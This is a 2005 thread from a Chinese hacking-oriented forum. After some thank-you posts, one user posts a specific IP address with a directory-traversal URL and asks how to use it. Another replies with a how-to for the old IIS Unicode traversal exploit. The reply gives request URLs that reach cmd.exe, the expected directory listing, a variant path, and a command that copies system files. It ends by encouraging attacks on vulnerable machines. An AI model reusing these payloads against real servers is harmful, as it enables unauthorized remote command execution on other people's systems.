黑色海岸线论坛 - Powered by Discuz! Board

标题: [建议]谢谢大家 [打印本页]

作者: tendygreen 时间: 2005-12-2 11:07 标题: [建议]谢谢大家

这么多天来在这里学到了不少东西。非常感谢各位的无私奉献。我们会继续努力学的。谢谢大家了！

作者: 亮剑 时间: 2005-12-2 11:21 标题: [建议]谢谢大家

是呀！
在这里学到了不少网络安全的知识。真的感谢大家！
顶顶！

作者: 天空飞人 时间: 2005-12-2 14:37 标题: [建议]谢谢大家

坚持就是胜利

作者: icewolf 时间: 2005-12-13 18:58 标题: [建议]谢谢大家

主机:61.180.62.144
可执行Url:
发现:http://61.180.62.144/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这个应该如何用啊??

作者: 天空飞人 时间: 2005-12-13 23:38 标题: [建议]谢谢大家

由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞）
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。
如果成功，那么在浏览区可看到如下信息：
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）
是不是有自己机器的感觉了，正点！就是这种感觉！
cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！
http://11.11.22.22/msadc/..%c1%1c../..%c1%1c.. ... ystem32/cmd.exe?/c+dir （这个命令同样道理）
大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe
会dos的朋友一定懂其意义了，不懂的请去看书 .
不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

作者: x86 时间: 2005-12-14 22:07 标题: [建议]谢谢大家

跳转大法？

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)